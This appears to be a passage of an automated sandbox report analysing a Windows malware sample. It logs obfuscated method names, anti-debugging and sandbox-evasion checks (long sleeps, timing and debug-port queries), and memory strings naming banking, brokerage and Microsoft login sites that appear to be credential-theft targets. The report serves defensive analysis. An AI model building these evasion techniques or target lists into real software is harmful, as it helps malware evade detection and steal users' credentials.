Source: 0.2.file.exe.2f00000.1.raw.unpack, XgoyoPZt7joAwfstZu.cs High entropy of concatenated method names: 'BX89LgZB7', 'D3qeRj17O', 'zuP1dgZCK', 'aX2GUwUwU', 'irqmhopHZ', 'avpt2uHrs', 'xwMnjxUjVSFftCmKmV', 'zunhvUw6AcRwHgkRM9', 'f9wVl4GIn', 'Fcn6iCrGI'
Source: 0.2.file.exe.2f00000.1.raw.unpack, II5e620l6UArMFUbwB.cs High entropy of concatenated method names: 'G3AYDcAb5V', 'WtsYS9LJcY', 'INDVcqVgQl', 'KBwVjCFkF1', 'lXbYyTyqnm', 'adGYhcs0Dq', 'XncYJnugpP', 'cjNYKZ1STC', 'OCHYMXhba3', 'oUlYCtmZ7j'
Source: 0.2.file.exe.2f00000.1.raw.unpack, Wwv9pRIVU2pDOGA83U.cs High entropy of concatenated method names: 'GksjTGYEsi', 'S0kj5fnZnZ', 'UWqjOjjHfi', 'hmujAfWKcf', 'H5lj2lV7yQ', 'CUpjoDWMBp', 'HTywOlokl0iBJBw3Ba', 'QEBivazDOUN5bnlukg', 'wgLjjTwomT', 'xgTjW9J0xS'
Source: 0.2.file.exe.2f00000.1.raw.unpack, bXMrWYW0lkNZduuFmi.cs High entropy of concatenated method names: 'gu2V0kWP6O', 'wxgVi20qOE', 'wafVX7CCQh', 'HxOVwEBquR', 'Q9pVKUTuU2', 'FPvV8JgGYk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.2f00000.1.raw.unpack, xc65kWLEQ8WPsjOLQc.cs High entropy of concatenated method names: 'Dispose', 'RtdjIE2Nuv', 'sh5uiJKnFi', 'UIoQQnpZgC', 'r7qjSi7io5', 'uUljzXYMcp', 'ProcessDialogKey', 'Cb4ucvBaSm', 'HRLujpqTWW', 'eKauuP8bq6'
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: file.exe PID: 3660, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2D60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2FC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2F00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 55B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 65B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 66E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 76E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 88E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 98E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: A8E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: B8E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E096E rdtsc 2_2_010E096E
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\unlodctr.exe API coverage: 2.6 %
Source: C:\Users\user\Desktop\file.exe TID: 3092 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 4764 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 4764 Thread sleep time: -62000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\unlodctr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0083B7C0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0083B7C0
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 17-EIW25.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 17-EIW25.6.dr Binary or memory string: discord.comVMware20,11696428655f
Source: 17-EIW25.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 17-EIW25.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 17-EIW25.6.dr Binary or memory string: global block list test formVMware20,11696428655
Source: 17-EIW25.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 17-EIW25.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: SIsaiIITJVPvUAG.exe, 00000007.00000002.3271502206.00000000016FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~m
Source: 17-EIW25.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 17-EIW25.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 17-EIW25.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 17-EIW25.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 17-EIW25.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 17-EIW25.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 17-EIW25.6.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 17-EIW25.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: unlodctr.exe, 00000006.00000002.3270803380.000000000095E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2909222139.000002AEF325C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 17-EIW25.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 17-EIW25.6.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 17-EIW25.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 17-EIW25.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 17-EIW25.6.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: 17-EIW25.6.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 17-EIW25.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 17-EIW25.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 17-EIW25.6.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 17-EIW25.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 17-EIW25.6.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 17-EIW25.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 17-EIW25.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 17-EIW25.6.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 17-EIW25.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 17-EIW25.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E096E rdtsc 2_2_010E096E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004172A3 LdrLoadDll, 2_2_004172A3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01160115 mov eax, dword ptr fs:[00000030h] 2_2_01160115
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114A118 mov ecx, dword ptr fs:[00000030h] 2_2_0114A118
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114A118 mov eax, dword ptr fs:[00000030h] 2_2_0114A118
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114A118 mov eax, dword ptr fs:[00000030h] 2_2_0114A118
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114A118 mov eax, dword ptr fs:[00000030h] 2_2_0114A118
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov eax, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov ecx, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov eax, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov eax, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov ecx, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov eax, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov eax, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov ecx, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov eax, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E10E mov ecx, dword ptr fs:[00000030h] 2_2_0114E10E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D0124 mov eax, dword ptr fs:[00000030h] 2_2_010D0124
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01138158 mov eax, dword ptr fs:[00000030h] 2_2_01138158
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01134144 mov eax, dword ptr fs:[00000030h] 2_2_01134144
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01134144 mov eax, dword ptr fs:[00000030h] 2_2_01134144
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01134144 mov ecx, dword ptr fs:[00000030h] 2_2_01134144
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01134144 mov eax, dword ptr fs:[00000030h] 2_2_01134144
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01134144 mov eax, dword ptr fs:[00000030h] 2_2_01134144
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6154 mov eax, dword ptr fs:[00000030h] 2_2_010A6154
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6154 mov eax, dword ptr fs:[00000030h] 2_2_010A6154
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109C156 mov eax, dword ptr fs:[00000030h] 2_2_0109C156
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E0185 mov eax, dword ptr fs:[00000030h] 2_2_010E0185
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112019F mov eax, dword ptr fs:[00000030h] 2_2_0112019F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112019F mov eax, dword ptr fs:[00000030h] 2_2_0112019F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112019F mov eax, dword ptr fs:[00000030h] 2_2_0112019F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112019F mov eax, dword ptr fs:[00000030h] 2_2_0112019F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01144180 mov eax, dword ptr fs:[00000030h] 2_2_01144180
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01144180 mov eax, dword ptr fs:[00000030h] 2_2_01144180
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115C188 mov eax, dword ptr fs:[00000030h] 2_2_0115C188
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115C188 mov eax, dword ptr fs:[00000030h] 2_2_0115C188
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109A197 mov eax, dword ptr fs:[00000030h] 2_2_0109A197
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109A197 mov eax, dword ptr fs:[00000030h] 2_2_0109A197
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109A197 mov eax, dword ptr fs:[00000030h] 2_2_0109A197
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0111E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0111E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0111E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0111E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0111E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011661C3 mov eax, dword ptr fs:[00000030h] 2_2_011661C3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011661C3 mov eax, dword ptr fs:[00000030h] 2_2_011661C3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011761E5 mov eax, dword ptr fs:[00000030h] 2_2_011761E5
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D01F8 mov eax, dword ptr fs:[00000030h] 2_2_010D01F8
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01124000 mov ecx, dword ptr fs:[00000030h] 2_2_01124000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 mov eax, dword ptr fs:[00000030h] 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 mov eax, dword ptr fs:[00000030h] 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 mov eax, dword ptr fs:[00000030h] 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 mov eax, dword ptr fs:[00000030h] 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 mov eax, dword ptr fs:[00000030h] 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 mov eax, dword ptr fs:[00000030h] 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 mov eax, dword ptr fs:[00000030h] 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 mov eax, dword ptr fs:[00000030h] 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE016 mov eax, dword ptr fs:[00000030h] 2_2_010BE016
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE016 mov eax, dword ptr fs:[00000030h] 2_2_010BE016
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE016 mov eax, dword ptr fs:[00000030h] 2_2_010BE016
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE016 mov eax, dword ptr fs:[00000030h] 2_2_010BE016
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01136030 mov eax, dword ptr fs:[00000030h] 2_2_01136030
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109A020 mov eax, dword ptr fs:[00000030h] 2_2_0109A020
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109C020 mov eax, dword ptr fs:[00000030h] 2_2_0109C020
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01126050 mov eax, dword ptr fs:[00000030h] 2_2_01126050
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A2050 mov eax, dword ptr fs:[00000030h] 2_2_010A2050
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CC073 mov eax, dword ptr fs:[00000030h] 2_2_010CC073
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A208A mov eax, dword ptr fs:[00000030h] 2_2_010A208A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011660B8 mov eax, dword ptr fs:[00000030h] 2_2_011660B8
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011660B8 mov ecx, dword ptr fs:[00000030h] 2_2_011660B8
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011380A8 mov eax, dword ptr fs:[00000030h] 2_2_011380A8
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011220DE mov eax, dword ptr fs:[00000030h] 2_2_011220DE
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A80E9 mov eax, dword ptr fs:[00000030h] 2_2_010A80E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0109A0E3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011260E0 mov eax, dword ptr fs:[00000030h] 2_2_011260E0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0109C0F0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E20F0 mov ecx, dword ptr fs:[00000030h] 2_2_010E20F0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA30B mov eax, dword ptr fs:[00000030h] 2_2_010DA30B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA30B mov eax, dword ptr fs:[00000030h] 2_2_010DA30B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA30B mov eax, dword ptr fs:[00000030h] 2_2_010DA30B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109C310 mov ecx, dword ptr fs:[00000030h] 2_2_0109C310
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C0310 mov ecx, dword ptr fs:[00000030h] 2_2_010C0310
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116A352 mov eax, dword ptr fs:[00000030h] 2_2_0116A352
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01148350 mov ecx, dword ptr fs:[00000030h] 2_2_01148350
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112035C mov eax, dword ptr fs:[00000030h] 2_2_0112035C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112035C mov eax, dword ptr fs:[00000030h] 2_2_0112035C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112035C mov eax, dword ptr fs:[00000030h] 2_2_0112035C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112035C mov ecx, dword ptr fs:[00000030h] 2_2_0112035C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112035C mov eax, dword ptr fs:[00000030h] 2_2_0112035C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112035C mov eax, dword ptr fs:[00000030h] 2_2_0112035C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01122349 mov eax, dword ptr fs:[00000030h] 2_2_01122349
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114437C mov eax, dword ptr fs:[00000030h] 2_2_0114437C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109E388 mov eax, dword ptr fs:[00000030h] 2_2_0109E388
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109E388 mov eax, dword ptr fs:[00000030h] 2_2_0109E388
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109E388 mov eax, dword ptr fs:[00000030h] 2_2_0109E388
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C438F mov eax, dword ptr fs:[00000030h] 2_2_010C438F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C438F mov eax, dword ptr fs:[00000030h] 2_2_010C438F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01098397 mov eax, dword ptr fs:[00000030h] 2_2_01098397
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01098397 mov eax, dword ptr fs:[00000030h] 2_2_01098397
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01098397 mov eax, dword ptr fs:[00000030h] 2_2_01098397
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011443D4 mov eax, dword ptr fs:[00000030h] 2_2_011443D4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011443D4 mov eax, dword ptr fs:[00000030h] 2_2_011443D4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA3C0 mov eax, dword ptr fs:[00000030h] 2_2_010AA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA3C0 mov eax, dword ptr fs:[00000030h] 2_2_010AA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA3C0 mov eax, dword ptr fs:[00000030h] 2_2_010AA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA3C0 mov eax, dword ptr fs:[00000030h] 2_2_010AA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA3C0 mov eax, dword ptr fs:[00000030h] 2_2_010AA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA3C0 mov eax, dword ptr fs:[00000030h] 2_2_010AA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A83C0 mov eax, dword ptr fs:[00000030h] 2_2_010A83C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A83C0 mov eax, dword ptr fs:[00000030h] 2_2_010A83C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A83C0 mov eax, dword ptr fs:[00000030h] 2_2_010A83C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A83C0 mov eax, dword ptr fs:[00000030h] 2_2_010A83C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E3DB mov eax, dword ptr fs:[00000030h] 2_2_0114E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E3DB mov eax, dword ptr fs:[00000030h] 2_2_0114E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E3DB mov ecx, dword ptr fs:[00000030h] 2_2_0114E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114E3DB mov eax, dword ptr fs:[00000030h] 2_2_0114E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011263C0 mov eax, dword ptr fs:[00000030h] 2_2_011263C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115C3CD mov eax, dword ptr fs:[00000030h] 2_2_0115C3CD
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B03E9 mov eax, dword ptr fs:[00000030h] 2_2_010B03E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B03E9 mov eax, dword ptr fs:[00000030h] 2_2_010B03E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B03E9 mov eax, dword ptr fs:[00000030h] 2_2_010B03E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B03E9 mov eax, dword ptr fs:[00000030h] 2_2_010B03E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B03E9 mov eax, dword ptr fs:[00000030h] 2_2_010B03E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B03E9 mov eax, dword ptr fs:[00000030h] 2_2_010B03E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B03E9 mov eax, dword ptr fs:[00000030h] 2_2_010B03E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B03E9 mov eax, dword ptr fs:[00000030h] 2_2_010B03E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D63FF mov eax, dword ptr fs:[00000030h] 2_2_010D63FF
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE3F0 mov eax, dword ptr fs:[00000030h] 2_2_010BE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE3F0 mov eax, dword ptr fs:[00000030h] 2_2_010BE3F0
